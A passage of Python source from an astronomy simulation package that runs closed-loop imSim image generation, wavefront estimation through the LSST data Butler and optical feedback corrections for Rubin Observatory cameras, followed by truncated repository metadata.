self.imsim_cmpt.get_opd_pssn_from_file(opd_pssn_file_name)\n            self.log.info(\"Calculated PSSN is %s.\" % pssn)\n\n            # Get the GQ effective FWHM from file\n            gq_eff_fwhm = self.imsim_cmpt.get_opd_gq_eff_fwhm_from_file(\n                opd_pssn_file_name\n            )\n            self.log.info(\"GQ effective FWHM is %.4f.\" % gq_eff_fwhm)\n\n            # Set the FWHM data\n            fwhm = self.imsim_cmpt.get_list_of_fwhm_sensor_data(opd_pssn_file_name)\n\n            self.imsim_cmpt.reorder_and_save_wf_err_file(\n                list_of_wf_err,\n                ref_sensor_name_list,\n                get_camera(cam_type),\n                zk_file_name=wfs_zk_file_name,\n            )\n\n            # Calculate the DOF\n            wfe = np.array(\n                [sensor_wfe.annular_zernike_poly for sensor_wfe in list_of_wf_err]\n            )\n\n            sensor_names = np.array(\n                [sensor_wfe.sensor_name for sensor_wfe in list_of_wf_err]\n            )\n\n            # Only include the fwhm data from the sensors we are simulating\n            # (e.g. only raft centers instead of full FAM).\n            if self.use_ccd_img:\n                fwhm_idx = [\n                    ref_sensor_name_list.index(sens_name) for sens_name in sensor_names\n                ]\n                fwhm = fwhm[fwhm_idx]\n\n            # Pass data to OFC\n            self.ofc_calc.set_fwhm_data(fwhm, sensor_names)\n\n            self.ofc_calc.calculate_corrections(\n                wfe=wfe,\n                sensor_names=sensor_names,\n                filter_name=obs_metadata.band.upper(),\n                gain=-1,\n                rotation_angle=obs_metadata.rotator_angle,\n            )\n\n            # Set the new aggregated DOF to the imSim component\n            dof_in_um = self.ofc_calc.ofc_controller.aggregated_state\n            self.imsim_cmpt.dof_in_um = dof_in_um\n\n            # Save the DOF file\n            self.imsim_cmpt.save_dof_in_um_file_for_next_iter(\n                dof_in_um_file_name=dof_in_um_file_name\n            )\n\n        # Summarize the FWHM\n        pssn_files = [\n            os.path.join(\n                base_output_dir,\n                \"%s%d\" % (iter_default_dir_name, num),\n                output_img_dir_name,\n                opd_pssn_file_name,\n            )\n            for num in range(iter_num)\n        ]\n        save_to_file_path = os.path.join(base_output_dir, fwhm_iters_file_name)\n        plot_fwhm_of_iters(pssn_files, save_to_file_path=save_to_file_path)\n\n    def _generate_images(\n        self,\n        obs_metadata: ObsMetadata,\n        cam_type: CamType,\n        sky_seed: int = 42,\n        pert_seed: int = 11,\n        num_pro: int = 1,\n        imsim_config_pointer_file: str | None = None,\n        turn_off_sky_background: bool = False,\n        turn_off_atmosphere: bool = False,\n    ) -> None:\n        \"\"\"Generate the simulated images with imSim.\n\n        Parameters\n        ----------\n        obs_metadata : lsst.ts.imsim.ObsMetadata object\n            Observation metadata.\n        cam_type : lsst.ts.wep.utils.CamType\n            Camera type.\n        sky_seed : int, optional\n            Random seed for the sky background.\n            (The default is 42.)\n        pert_seed : int, optional\n            Random seed for the perturbations.\n            (The default is 11.)\n        num_pro : int, optional\n            Number of processors to run imSim. (the default is 1.)\n        imsim_config_pointer_file : str or None, optional\n            Path to imsim config pointer file.\n            If None then the code will use the default in policy directory.\n            (The default is None.)\n        turn_off_sky_background : bool, optional\n            If set to True then the closed loop will simulate images\n            without sky background. 
(The default is False.)\n turn_off_atmosphere : bool, optional\n If set to True then will turn off the imsim atmosphere.\n (The default is False.)\n \"\"\"\n\n # Generate the images\n if imsim_config_pointer_file is None:\n if cam_type == CamType.LsstCam:\n default_pointer = \"lsstCamDefaultPointer.yaml\"\n elif cam_type == CamType.LsstFamCam:\n default_pointer = \"lsstFamCamDefaultPointer.yaml\"\n elif cam_type == CamType.ComCam:\n default_pointer = \"lsstComCamDefaultPointer.yaml\"\n imsim_config_pointer_file = os.path.join(get_config_dir(), default_pointer)\n\n base_config_yaml = self.imsim_cmpt.assemble_config_yaml(\n obs_metadata, imsim_config_pointer_file, cam_type\n )\n\n inst_cat = self.imsim_cmpt.gen_instance_catalog(self.sky_sim)\n inst_cat_path = os.path.join(self.imsim_cmpt.output_dir, \"instCat.txt\")\n with open(inst_cat_path, \"w\") as file:\n file.write(inst_cat)\n\n # Override imsim config defaults with instance catalog info\n base_config_yaml[\"image\"].pop(\"image_pos\")\n base_config_yaml[\"output\"][\"nproc\"] = num_pro\n base_config_yaml[\"image\"][\"random_seed\"] = sky_seed\n base_config_yaml[\"input\"][\"telescope\"][\"fea\"][\"m1m3_lut\"][\"seed\"] = pert_seed\n if turn_off_sky_background:\n base_config_yaml[\"image\"][\"sky_level\"] = 0\n if turn_off_atmosphere:\n base_config_yaml[\"input\"].pop(\"atm_psf\")\n if {\"type\": \"AtmosphericPSF\"} in base_config_yaml[\"psf\"][\"items\"]:\n base_config_yaml[\"psf\"][\"items\"].remove({\"type\": \"AtmosphericPSF\"})\n base_config_yaml[\"psf\"][\"items\"].append(\n {\"type\": \"Kolmogorov\", \"fwhm\": 0.7}\n )\n\n if cam_type == CamType.LsstCam:\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n base_config_yaml, inst_cat_path, use_ccd_img=self.use_ccd_img\n )\n imsim_config_path = os.path.join(\n self.imsim_cmpt.output_dir, f\"imsimConfig_{obs_metadata.seq_num}.yaml\"\n )\n self.log.info(f\"Writing Imsim Configuration file to {imsim_config_path}\")\n self.imsim_cmpt.write_yaml_and_run_imsim(\n imsim_config_path, imsim_config_yaml\n )\n elif cam_type in [CamType.LsstFamCam, CamType.ComCam]:\n if self.use_ccd_img:\n # Run once for OPD\n imsim_opd_config_path = os.path.join(\n self.imsim_cmpt.output_dir, \"imsimConfig_opd.yaml\"\n )\n if not os.path.exists(imsim_opd_config_path):\n imsim_config_yaml = deepcopy(base_config_yaml)\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n imsim_config_yaml, inst_cat_path, use_ccd_img=False\n )\n self.log.info(\n f\"Writing Imsim Configuration file to {imsim_opd_config_path}\"\n )\n self.imsim_cmpt.write_yaml_and_run_imsim(\n imsim_opd_config_path, imsim_config_yaml\n )\n\n # Run CCD images\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n base_config_yaml, inst_cat_path, use_ccd_img=self.use_ccd_img\n )\n\n # Add defocus\n imsim_config_yaml[\"input\"][\"telescope\"][\"focusZ\"] = (\n obs_metadata.focus_z * 1e-3\n )\n # Remove OPD from config since we already created it\n imsim_config_yaml[\"output\"].pop(\"opd\")\n imsim_config_path = os.path.join(\n self.imsim_cmpt.output_dir,\n f\"imsimConfig_{obs_metadata.seq_num}.yaml\",\n )\n self.log.info(\n f\"Writing Imsim Configuration file to {imsim_config_path}\"\n )\n self.imsim_cmpt.write_yaml_and_run_imsim(\n imsim_config_path, imsim_config_yaml\n )\n else:\n # Run OPD only mode\n imsim_config_yaml = self.imsim_cmpt.add_sources_to_config(\n base_config_yaml, inst_cat_path, use_ccd_img=False\n )\n imsim_config_path = os.path.join(\n self.imsim_cmpt.output_dir, \"imsimConfig.yaml\"\n )\n imsimOpdPath 
= os.path.join(\n                    self.imsim_cmpt.output_img_dir,\n                    imsim_config_yaml[\"output\"][\"opd\"][\"file_name\"],\n                )\n                if os.path.exists(imsimOpdPath):\n                    self.log.info(\"OPD already created, moving to analysis.\")\n                else:\n                    self.log.info(\n                        f\"Writing Imsim Configuration file to {imsim_config_path}\"\n                    )\n                    self.imsim_cmpt.write_yaml_and_run_imsim(\n                        imsim_config_path, imsim_config_yaml\n                    )\n\n    def _calc_wf_err_from_img(\n        self,\n        obs_metadata: ObsMetadata,\n        butler_root_path: str,\n        cam_type: CamType,\n        num_pro: int = 1,\n        pipeline_file: str | None = None,\n        filter_type_name: str = \"\",\n    ) -> list[SensorWavefrontError]:\n        \"\"\"Calculate the wavefront error from the images generated by imSim.\n\n        Parameters\n        ----------\n        obs_metadata : lsst.ts.imsim.ObsMetadata object\n            Observation metadata.\n        butler_root_path : str\n            Path to the butler repository.\n        cam_type : lsst.ts.wep.utils.CamType\n            Camera type.\n        num_pro : int, optional\n            Number of processors to run the DM pipeline. (the default is 1.)\n        pipeline_file : str or None, optional\n            Path to existing pipeline yaml file to use.\n            If None then the code will write its own default pipeline yaml.\n            (The default is None.)\n        filter_type_name : str, optional\n            Filter type name: ref (or ''), u, g, r, i, z, or y.\n\n        Returns\n        -------\n        list[lsst.ts.imsim.utils.SensorWavefrontError]\n            List of SensorWavefrontError objects.\n        \"\"\"\n\n        # Ingest images into butler gen3\n        self.ingest_data(butler_root_path=butler_root_path, cam_type=cam_type)\n\n        list_of_wf_err = self.run_wep(\n            obs_metadata.seq_num,\n            butler_root_path,\n            cam_type,\n            num_pro=num_pro,\n            pipeline_file=pipeline_file,\n            filter_type_name=filter_type_name,\n        )\n\n        return list_of_wf_err\n\n    def _get_butler_inst_name(self, cam_type) -> str:\n        \"\"\"Translate cam_type into suffix used by butler\n        in command line instructions.\n\n        Parameters\n        ----------\n        cam_type : lsst.ts.wep.utils.CamType\n            Camera type.\n\n        Returns\n        -------\n        str\n            Suffix attached to \"LSST\" to specify instrument to butler.\n\n        Raises\n        ------\n        ValueError\n            CamType must be one of LsstCam, LsstFamCam, ComCam.\n        \"\"\"\n\n        if cam_type in [CamType.LsstCam, CamType.LsstFamCam]:\n            butler_inst_name = \"Cam\"\n        elif cam_type == CamType.ComCam:\n            butler_inst_name = \"ComCam\"\n        else:\n            err_msg = f\"CamType {cam_type} not one of LsstCam, LsstFamCam, ComCam.\"\n            raise ValueError(err_msg)\n\n        return butler_inst_name\n\n    def run_wep(\n        self,\n        seq_num: int,\n        butler_root_path: str,\n        cam_type: CamType,\n        num_pro: int = 1,\n        pipeline_file: str | None = None,\n        filter_type_name: str = \"\",\n    ) -> list[SensorWavefrontError]:\n        \"\"\"Run wavefront estimation pipeline task for wavefront sensors.\n\n        Parameters\n        ----------\n        seq_num : int\n            Observation id.\n        butler_root_path : str\n            Path to the butler gen3 repository.\n        cam_type : lsst.ts.wep.utils.CamType\n            Camera type.\n        num_pro : int, optional\n            Number of processors to run the DM pipeline. 
(the default is 1.)\n pipeline_file : str or None, optional\n Path to existing pipeline yaml file to use.\n If None then the code will write its own default pipeline yaml.\n (The default is None.)\n filter_type_name : str, optional\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n\n Returns\n -------\n list[lsst.ts.imsim.utils.SensorWavefrontError]\n List of SensorWavefrontError with the results of the wavefront\n estimation pipeline for each sensor.\n \"\"\"\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n if pipeline_file is None:\n pipeline_yaml = f\"{getCamNameFromCamType(cam_type)}Pipeline.yaml\"\n pipeline_yaml_path = os.path.join(butler_root_path, pipeline_yaml)\n self.write_wep_configuration(cam_type, pipeline_yaml_path, filter_type_name)\n else:\n pipeline_yaml_path = pipeline_file\n\n butler = dafButler.Butler(butler_root_path)\n\n if f\"LSST{butler_inst_name}/calib\" not in butler.registry.queryCollections():\n self.log.info(\"Ingesting curated calibrations.\")\n\n runProgram(\n f\"butler write-curated-calibrations {butler_root_path} lsst.obs.lsst.Lsst{butler_inst_name}\"\n )\n # Sequence number or seq_num is an integer number\n # associated with each image taken in a single day.\n # The limit for seq_num is 5 digits,\n # set by the expectation that no more than 100K images\n # could be taken in a single day (i.e. no more than 1/sec).\n if cam_type == CamType.LsstCam:\n runProgram(\n f\"pipetask run -b {butler_root_path} \"\n f\"-i refcats,LSST{butler_inst_name}/raw/all,LSST{butler_inst_name}/calib/unbounded \"\n f\"--instrument lsst.obs.lsst.Lsst{butler_inst_name} \"\n f\"--register-dataset-types --output-run ts_imsim_{seq_num} -p {pipeline_yaml_path} -d \"\n f'\"visit.seq_num IN ({seq_num})\" -j {num_pro}'\n )\n elif cam_type in (CamType.LsstFamCam, CamType.ComCam):\n runProgram(\n f\"pipetask run -b {butler_root_path} \"\n f\"-i refcats,LSST{butler_inst_name}/raw/all,LSST{butler_inst_name}/calib/unbounded \"\n f\"--instrument lsst.obs.lsst.Lsst{butler_inst_name} \"\n f\"--register-dataset-types --output-run ts_imsim_{seq_num} -p {pipeline_yaml_path} -d \"\n f'\"visit.seq_num IN ({seq_num-1}, {seq_num})\" -j {num_pro}'\n )\n\n # Need to redefine butler because the database changed.\n butler = dafButler.Butler(butler_root_path)\n\n dataset_refs = butler.registry.queryDatasets(\n datasetType=\"zernikeEstimateAvg\", collections=[f\"ts_imsim_{seq_num}\"]\n )\n\n # Get the map for detector Id to detector name\n camera = butler.get(\n \"camera\",\n {\"instrument\": f\"LSST{butler_inst_name}\"},\n collections=[f\"LSST{butler_inst_name}/calib/unbounded\"],\n )\n det_id_map = camera.getIdMap()\n det_name_map = camera.getNameMap()\n\n list_of_wf_err = []\n\n for dataset in dataset_refs:\n data_id = {\n \"instrument\": dataset.dataId[\"instrument\"],\n \"detector\": dataset.dataId[\"detector\"],\n \"visit\": dataset.dataId[\"visit\"],\n }\n\n zer_coeff = butler.get(\n \"zernikeEstimateAvg\",\n dataId=data_id,\n collections=[f\"ts_imsim_{seq_num}\"],\n )\n\n sensor_wavefront_data = SensorWavefrontError()\n sensor_name = det_id_map[dataset.dataId[\"detector\"]].getName()\n sensor_wavefront_data.sensor_name = sensor_name\n sensor_wavefront_data.sensor_id = det_name_map[sensor_name].getId()\n sensor_wavefront_data.annular_zernike_poly = zer_coeff\n\n list_of_wf_err.append(sensor_wavefront_data)\n\n return list_of_wf_err\n\n def write_wep_configuration(\n self, cam_type: CamType, pipeline_yaml_path: str, filter_type_name: str\n ) -> None:\n \"\"\"Write wavefront estimation 
pipeline task configuration.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n pipeline_yaml_path : str\n Path where the pipeline task configuration yaml file\n should be saved.\n filter_type_name : str\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n \"\"\"\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n\n # Remap reference filter\n filter_type_name = self.map_filter_ref_to_g(filter_type_name)\n\n with open(pipeline_yaml_path, \"w\") as fp:\n fp.write(\n f\"\"\"# This yaml file is used to define the tasks and configuration of\n# a Gen 3 pipeline used for testing in ts_wep.\ndescription: wep basic processing test pipeline\n# Here we specify the corresponding instrument for the data we\n# will be using.\ninstrument: lsst.obs.lsst.Lsst{butler_inst_name}\n# Use imported instrument configuration\nimports:\n - location: {getWepConfigDir()}/cwfs/instData/{getCamNameFromCamType(cam_type)}/instParamPipeConfig.yaml\n# Then we can specify each task in our pipeline by a name\n# and then specify the class name corresponding to that task\ntasks:\n isr:\n class: lsst.ip.isr.isrTask.IsrTask\n # Below we specify the configuration settings we want to use\n # when running the task in this pipeline. Since our data doesn't\n # include bias or flats we only want to use doApplyGains and\n # doOverscan in our isr task.\n config:\n connections.outputExposure: 'postISRCCD'\n doBias: False\n doVariance: False\n doLinearize: False\n doCrosstalk: False\n doDefect: False\n doNanMasking: False\n doInterpolate: False\n doBrighterFatter: False\n doDark: False\n doFlat: False\n doApplyGains: True\n doFringe: False\n doOverscan: True\n python: OverscanCorrectionTask.ConfigClass.fitType = 'MEDIAN'\n generateDonutCatalogWcsTask:\n class: lsst.ts.wep.task.generateDonutCatalogWcsTask.GenerateDonutCatalogWcsTask\n\"\"\"\n )\n\n def run_img(\n self,\n inst: str,\n filter_type_name: str,\n rot_cam_in_deg: float,\n boresight: list[float],\n mjd: float,\n star_mag: float,\n base_output_dir: str,\n path_sky_file: str,\n do_erase_dir_content: bool,\n sky_seed: int,\n pert_seed: int,\n iter_num: int,\n pipeline_file: str,\n imsim_config_pointer_file: str,\n turn_off_sky_background: bool,\n turn_off_atmosphere: bool,\n turn_off_wavefront_estimates: bool,\n num_pro: int,\n raw_seeing: float,\n ) -> None:\n \"\"\"Run the simulation of images.\n\n Parameters\n ----------\n inst : str\n Instrument to use: currently only lsst.\n filter_type_name : str\n Filter type name: ref, u, g, r, i, z, or y.\n rot_cam_in_deg : float\n The camera rotation angle in degree (-90 to 90).\n boresight : list[float]\n Boresight [ra, dec] in degree.\n mjd : float\n MJD of the observation.\n star_mag : float\n Magnitude of stars if using default sky file.\n base_output_dir : str\n Base output directory.\n path_sky_file : str\n Path to the sky file.\n do_erase_dir_content : bool\n Do the erase of the content of base output directory or not.\n sky_seed : int\n Random seed for the sky background.\n pert_seed : int\n Random seed for the perturbations.\n iter_num : int\n Number of closed-loop iteration.\n pipeline_file : str\n Path to existing pipeline yaml file to use. If empty string\n then the code will write its own default pipeline yaml.\n imsim_config_pointer_file : str\n Path to pointer file with locations of yaml configuration\n files for imsim submodules. 
If empty string then the code\n will use the default in policy/config for the given inst.\n turn_off_sky_background : bool\n If set to True then the closed loop will simulate images\n without sky background.\n turn_off_atmosphere : bool\n If set to True then will turn off the imsim atmosphere.\n turn_off_wavefront_estimates : bool\n If set to True then will run the closed loop only with\n the OPD.fits files and not simulated images.\n num_pro : int\n Number of processors to use.\n raw_seeing : float\n Raw seeing in arcsec.\n \"\"\"\n cam_type = getCamType(inst)\n base_output_dir = self.check_and_create_base_output_dir(base_output_dir)\n if do_erase_dir_content:\n self.erase_directory_content(base_output_dir)\n self.check_boresight(boresight)\n self.boresight_ra = boresight[0]\n self.boresight_dec = boresight[1]\n self.boresight_rot_ang = rot_cam_in_deg\n # Remap the reference filter to g\n filter_type_name = self.map_filter_ref_to_g(filter_type_name)\n\n if turn_off_wavefront_estimates is True:\n self.use_ccd_img = False\n\n obs_metadata = ObsMetadata(\n ra=self.boresight_ra,\n dec=self.boresight_dec,\n band=filter_type_name.lower(),\n rotator_angle=self.boresight_rot_ang,\n mjd=mjd,\n raw_seeing=raw_seeing,\n )\n\n # Configure the components\n self.config_sky_sim(\n cam_type, obs_metadata, path_sky_file=path_sky_file, star_mag=star_mag\n )\n self.config_ofc_calc(cam_type)\n self.imsim_cmpt = ImsimCmpt()\n\n # If path_sky_file using default OPD positions write this to disk\n # so that the Butler can load it later\n if path_sky_file == \"\":\n path_sky_file = os.path.join(base_output_dir, \"sky_info.txt\")\n self.sky_sim.export_sky_to_file(path_sky_file)\n self.log.info(f\"Wrote new sky file to {path_sky_file}.\")\n\n # generate butler gen3 repo if needed\n butler_root_path = os.path.join(base_output_dir, \"imsimData\")\n\n if self.use_ccd_img:\n self.generate_butler(butler_root_path, cam_type)\n self.generate_ref_catalog(\n butler_root_path=butler_root_path,\n path_sky_file=path_sky_file,\n filter_type_name=filter_type_name,\n )\n\n self._run_sim(\n cam_type,\n obs_metadata,\n base_output_dir,\n butler_root_path,\n sky_seed,\n pert_seed,\n iter_num,\n num_pro=num_pro,\n pipeline_file=pipeline_file,\n imsim_config_pointer_file=imsim_config_pointer_file,\n turn_off_sky_background=turn_off_sky_background,\n turn_off_atmosphere=turn_off_atmosphere,\n )\n\n def generate_butler(self, butler_root_path: str, cam_type: CamType) -> None:\n \"\"\"Generate butler gen3.\n\n Parameters\n ----------\n butler_root_path: `str`\n Path to where the butler repository should be created.\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n \"\"\"\n\n self.log.info(\n f\"Generating butler gen3 in {butler_root_path} for {cam_type.name}\"\n )\n\n runProgram(f\"butler create {butler_root_path}\")\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n\n self.log.debug(f\"Registering Lsst{butler_inst_name}\")\n runProgram(\n f\"butler register-instrument {butler_root_path} lsst.obs.lsst.Lsst{butler_inst_name}\"\n )\n\n def generate_ref_catalog(\n self, butler_root_path: str, path_sky_file: str, filter_type_name: str\n ) -> None:\n \"\"\"Generate reference star catalog.\n\n Parameters\n ----------\n butler_root_path: `str`\n Path to the butler gen3 repository.\n path_sky_file: `str`\n Path to the catalog star file.\n filter_type_name : str\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n \"\"\"\n self.log.debug(\"Creating reference catalog.\")\n\n cat_dir = os.path.join(butler_root_path, 
\"skydata\")\n sky_file_name = os.path.join(cat_dir, \"sky_data.csv\")\n cat_config_file_name = os.path.join(cat_dir, \"cat.cfg\")\n sky_ecsv_file_name = os.path.join(cat_dir, \"filename_to_htm.ecsv\")\n cat_log_file_name = os.path.join(cat_dir, \"convert.log\")\n os.mkdir(cat_dir)\n\n # Read sky file and convert it to csv\n sky_data = astropy.io.ascii.read(path_sky_file)\n\n # Constructing the catalog of stars to use in the wavefront estimation\n # pipeline. It is used for target\n # selection, and affects magnitude limits\n # as set in generateDonutCatalogWcsTask pipeline yaml file\n sky_data.rename_column(\"Mag\", filter_type_name)\n\n sky_data.write(sky_file_name, format=\"csv\", overwrite=True)\n\n with open(cat_config_file_name, \"w\") as fp:\n fp.write(\n f\"\"\"config.ra_name='Ra'\nconfig.dec_name='Dec'\nconfig.id_name='Id'\nconfig.mag_column_list=['{filter_type_name}']\nconfig.dataset_config.ref_dataset_name='ref_cat'\n\"\"\"\n )\n\n runProgram(\n f\"convertReferenceCatalog {cat_dir} {cat_config_file_name} {sky_file_name}\",\n stdout=cat_log_file_name,\n stderr=cat_log_file_name,\n )\n\n runProgram(\n f\"butler register-dataset-type {butler_root_path} cal_ref_cat SimpleCatalog htm7\"\n )\n\n runProgram(\n f\"butler ingest-files -t direct {butler_root_path} cal_ref_cat refcats {sky_ecsv_file_name}\"\n )\n\n def ingest_data(self, butler_root_path: str, cam_type: CamType) -> None:\n \"\"\"Ingest data into a gen3 data Butler.\n\n Parameters\n ----------\n butler_root_path : str\n Path to the butler repository.\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n \"\"\"\n output_img_dir = self.imsim_cmpt.output_img_dir\n files = \" \".join(glob(os.path.join(output_img_dir, \"amp*\")))\n\n if cam_type in [CamType.LsstCam, CamType.LsstFamCam, CamType.ComCam]:\n runProgram(f\"butler ingest-raws {butler_root_path} {files}\")\n\n butler_inst_name = self._get_butler_inst_name(cam_type)\n\n runProgram(\n f\"butler define-visits {butler_root_path} lsst.obs.lsst.Lsst{butler_inst_name}\"\n )\n\n def erase_directory_content(self, target_dir: str) -> None:\n \"\"\"Erase the directory content.\n\n Parameters\n ----------\n target_dir : str\n Target directory.\n \"\"\"\n\n for file_on in os.listdir(target_dir):\n file_path = os.path.join(target_dir, file_on)\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n\n @staticmethod\n def set_default_parser(parser: ArgumentParser) -> ArgumentParser:\n \"\"\"Set the default parser.\n\n Parameters\n ----------\n parser : argparse.ArgumentParser\n Input parser.\n\n Returns\n -------\n argparse.ArgumentParser\n Updated parser.\n \"\"\"\n\n parser.add_argument(\n \"--inst\",\n type=str,\n default=\"lsst\",\n help=\"Instrument to use: currently lsst, lsstfam, comcam. (default: lsst)\",\n )\n\n parser.add_argument(\n \"--filter_type\",\n type=str,\n default=\"\",\n help=\"Filter type to use: u, g, r, i, z, y or empty string for \"\n \"reference wavelength. (default: '')\",\n )\n\n parser.add_argument(\n \"--rot_cam\",\n type=float,\n default=0.0,\n help=\"Rotate camera (degree) in counter-clockwise direction. 
(default: 0.0)\",\n )\n\n parser.add_argument(\"--output\", type=str, default=\"\", help=\"Output directory.\")\n\n parser.add_argument(\n \"--log_level\", type=int, default=logging.INFO, help=\"Log level.\"\n )\n\n parser.add_argument(\n \"--clobber\",\n default=False,\n action=\"store_true\",\n help=\"Delete existing output directory.\",\n )\n\n parser.add_argument(\n \"--config_pointer_file\",\n type=str,\n default=\"\",\n help=\"Imsim Configuration Pointer File.\",\n )\n\n parser.add_argument(\n \"--sky_seed\",\n type=int,\n default=42,\n help=\"Random seed for imsim sky (default: 42).\",\n )\n\n parser.add_argument(\n \"--pert_seed\",\n type=int,\n default=11,\n help=\"Random seed for m1m3_lut fractional actuator random error. \"\n \"(Default: 11)\",\n )\n\n parser.add_argument(\n \"--iter_num\",\n type=int,\n default=5,\n help=\"Number of closed-loop iterations. (default: 5)\",\n )\n\n parser.add_argument(\n \"--pipeline_file\",\n type=str,\n default=\"\",\n help=\"\"\"\n Location of user-specified pipeline configuration file.\n If left as empty string the code will create a default file.\n (default: '')\n \"\"\",\n )\n\n parser.add_argument(\n \"--num_proc\",\n type=int,\n default=1,\n help=\"Number of processor to run imSim and DM pipeline. (default: 1)\",\n )\n\n return parser\n\n @staticmethod\n def set_img_parser(parser: ArgumentParser) -> ArgumentParser:\n \"\"\"Set the image-specific parser.\n\n Parameters\n ----------\n parser : argparse.ArgumentParser\n Input parser.\n\n Returns\n -------\n argparse.ArgumentParser\n Updated parser.\n \"\"\"\n\n parser.add_argument(\n \"--boresight_deg\",\n type=float,\n nargs=2,\n default=[0, 0],\n help=\"Boresight [ra, dec] in degree. The default is [0, 0].\",\n )\n\n parser.add_argument(\n \"--sky_file\",\n type=str,\n default=\"\",\n help=\"\"\"\n Text file contains the star Id, ra, dec, and magnitude.\n The default is to use the OPD field positions with boresight\n [ra, dec] = [0, 0].\n \"\"\",\n )\n\n parser.add_argument(\n \"--mjd\", type=float, default=60115.33, help=\"Starting MJD of observation.\"\n )\n\n parser.add_argument(\n \"--star_mag\",\n type=float,\n default=15.0,\n help=\"Magnitude of stars if using default sky_file. 
The default is 15.\",\n )\n\n parser.add_argument(\n \"--turn_off_sky_background\",\n action=\"store_true\",\n help=\"Turn sky brightness model off.\",\n )\n\n parser.add_argument(\n \"--turn_off_atmosphere\", action=\"store_true\", help=\"Turn atmosphere off.\"\n )\n\n parser.add_argument(\n \"--turn_off_wavefront_estimates\",\n action=\"store_true\",\n help=\"\"\"\n Run with true wavefront values only.\n Turns off images generation and running CCDs through WEP.\n \"\"\",\n )\n\n parser.add_argument(\n \"--raw_seeing\",\n type=float,\n default=0.5,\n help=\"Raw seeing in arcsec (default: 0.5).\",\n )\n\n return parser\n", "repo_name": "lsst-ts/ts_imsim", "sub_path": "python/lsst/ts/imsim/closed_loop_task.py", "file_name": "closed_loop_task.py", "file_ext": "py", "file_size_in_byte": 48605, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "88", "api": [{"api_name": "logging.getLogger", "line_number": 36, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 57, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 58, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.sky_sim.SkySim", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 98, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.obs_metadata.ObsMetadata", "line_number": 99, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.opd_metrology.OpdMetrology", "line_number": 127, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 128, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 128, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstFamCam", "line_number": 128, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType.ComCam", "line_number": 128, "usage_type": "attribute"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 130, "usage_type": "call"}, {"api_name": "lsst.afw.cameraGeom.FIELD_ANGLE", "line_number": 133, "usage_type": "argument"}, {"api_name": "numpy.rad2deg", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 144, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.rotMatrix", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 155, "usage_type": "call"}, {"api_name": "lsst.ts.ofc.OFC", "line_number": 176, "usage_type": "call"}, {"api_name": "lsst.ts.ofc.OFCData", "line_number": 176, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.getCamNameFromCamType", "line_number": 176, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 216, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 237, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 240, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 240, "usage_type": "name"}, {"api_name": "lsst.afw.cameraGeom.DetectorType.WAVEFRONT", "line_number": 239, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 239, "usage_type": "name"}, {"api_name": 
"lsst.afw.cameraGeom.DetectorType.SCIENCE", "line_number": 241, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 241, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 249, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.get_camera", "line_number": 270, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.CamType.LsstCam", "line_number": 274, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.CamType", "line_number": 274, "usage_type": "name"}, {"api_name": "lsst.afw.cameraGeom.DetectorType.WAVEFRONT", "line_number": 273, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 273, "usage_type": "name"}, {"api_name": "lsst.afw.cameraGeom.DetectorType.SCIENCE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "lsst.afw.cameraGeom.DetectorType", "line_number": 275, "usage_type": "name"}, {"api_name": "lsst.ts.imsim.utils.make_dir", "line_number": 299, "usage_type": "call"}, {"api_name": "lsst.ts.wep.utils.FilterType.REF", "line_number": 323, "usage_type": "attribute"}, {"api_name": "lsst.ts.wep.utils.FilterType", "line_number": 323, "usage_type": "name"}, {"api_name": "lsst.ts.wep.utils.FilterType.LSST_U", "line_number": 325, "usage_type": "attribute"}, {"api_name": 